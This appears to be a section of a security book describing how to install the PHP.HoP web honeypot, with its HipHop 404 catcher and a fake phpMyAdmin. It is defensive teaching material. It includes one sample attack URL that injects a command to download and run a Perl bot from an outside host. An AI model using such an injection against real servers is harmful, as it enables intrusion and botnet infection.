Previous Page Next Page

3.6. PHP.HoP — A Web-Based Deception Framework

The purpose of PHP.HoP is similar to the GHH. It wants to provide a mechanism to identify and observe threats on the Web. According to one of the authors, Laurent Oudot, PHP.HoP can help to identify a wide range of security threats from automatic tools for finding security holes to web-based worms [68]. A web-based worm is a software entity that exploits vulnerabilities in web servers that allows it to gain control over the host running the web server and then continues on to infect other vulnerable web servers.

To deceive both human attackers as well as attacks from worms or other activities, PHP.HoP emulates a number of well-known web application vulnerabilities. One famous example is the phpBB bulletin board software that has been plagued with vulnerabilities that allow an adversary to execute arbitrary code on the underlying web server. See Section 10.2 for a case study of search worms where techniques similar to PHP.HoP are used to capture worm binaries.

3.6.1. Installation

To install PHP.HoP, you need to run an Apache web server with PHP support. Your PHP installation should be at least at version 4.0.

1.
Download the PHP.HoP software from http://www.rstack.org/phphop/download/.

2.
Unzip the archive in a temporary directory that is not part of your web server: $ unzip phphop-0.5.zip.

3.
PHP.HoP has two major directories: a library directory that is required for all modules and a modules directory that contains the code for the different PHP honeypots.

4.
Copy the lib directory to the root of your web server: $ cp -pr phphop-0.5/lib /var/httpd/htdocs. You need to replace /var/httpd/htdocs with the directory root of your web server.

5.
Choose which modules to install on your web server. At the time of this writing, PHP.HoP supports six different modules:

  • autobuild-fake-apache-dir: Pretends to be an empty directory

  • hiphop: A generic 404 handler for catching web-based worms

  • phpmyadmin: A fake phpmyadmin frontend

  • phpshell-by-macker: Simulates the phpshell by macker backdoor

  • webmail: Pretends to be an open web-based mail frontend

6.
Configure the config.php file so that it can find the support libraries. Some modules don't include a config.php file in their directory, so you might have to copy it from another module. The configuration is very simple; you need to change the following variables:

  • Point pathlib to the directory in which the library files reside.

  • Point pathlog to the directory in which log files should be created.

  • Set mailaddr to the e-mail address for which you want to receive alerts. An empty e-mail means that no e-mail alerts are going to be delivered.

In the following, we discuss how to configure two different modules. The other modules follow the same pattern. Some basic knowledge of PHP will be helpful.

3.6.2. HipHop

The HipHop module is the most interesting module provided by PHP.HoP. Its main purpose is to detect new attacks against a variety of web applications. If it detects any attempts to download exploits or bots onto your machine, it will instead capture the bot and save it for later analysis but not execute it.

There are several steps you must execute to install this module:

1.
Copy the HipHop module to your web server:

$ cp -pr hiphop-0.5/modules/hiphop /var/httpd/htdocs/

2.
Create the appropriate config.php file. In our case, we just copy it from another module:

$ cp -p hiphop-0.5/modules/phpmyadmin/config.php /var/httpd/htdocs/hiphop

3.
Unlike the other modules, HipHop requires some additional configuration in the .htaccess file. It not only determines who can access web pages but also how error pages like Page Not Found are presented. Add the following line to your .htaccess file at the root of the web server:

ErrorDocument 404 /hiphop/hiphop.php

If you do not have a .htaccess file yet, go ahead and create it. As a result, all URLs that do not lead to documents on your web server are being redirected to the honeypot.

You should be good to go now. Try to access a page that is not normally accessible. If everything worked correctly, you should see a text similar to Welcome/path/you/used/to/get/404. Attackers usually encode a list of Unix commands as part of the exploit. This often entails downloading and executing perlbots or other kinds of backdoors.

When you look at the hiphop.php source code, you will find some attack examples that you can try to determine if malicious payloads are really being downloaded. For example, try to access the following URL on your web server:

/board/skin/zero_vote/error.php?dir=http://example.uk/kaero/fbi.gif?&
  cmd=cd%20/tmp;curl%20-O%20example.uk/kaero/botperl;perl%20botperl

When HipHop receives this URL, it notices the curl command to download a Perl bot. HipHop internally emulates the download command and saves the bot in your configured download directory. In this example, HipHop will create the following files:

With a little bit of luck, your honeypot will collect many interesting payloads over time. When looking at the downloads, you might find the names of IRC servers, channels, and channel passwords. Joining these channels, can be amusing but also might lead to your IP address being subjected to denial of service attacks. So be careful. You can find more interesting details on botnets in Chapter 11.

3.6.3. PhpMyAdmin

Another PHP.HoP module leverages the fact that many web-based database frontends are not sufficiently secured and can be accessed from anyone on the Internet. In this case, PHP.HoP provides a lookalike of phpMyAdmin, a popular web-based frontend to MySQL servers. Many websites that run bulletin boards or present other databases to their users install phpMyAdmin to quickly browse or manage their databases. Although it is strongly encouraged to restrict access to the frontend, some web servers leave the door wide open. The corresponding PHP.HoP module emulates an unsecured phpMyAdmin installation. The installation is similar to the installation of HipHop. Once installed, anyone can visit your fake phpMyAdmin interface.

An adversary will see several databases, including databases called emails and secretfiles. Every access to the fake front end is logged in the logs directory. Each day has its own log file and includes the name of the remote host, the user agent, and other useful information.

Unfortunately, the fake phpMyAdmin does not simulate much functionality, so it is only going to be of limited interest to an attacker. We hope that future versions of PHP.HoP will improve on this.

Previous Page Next Page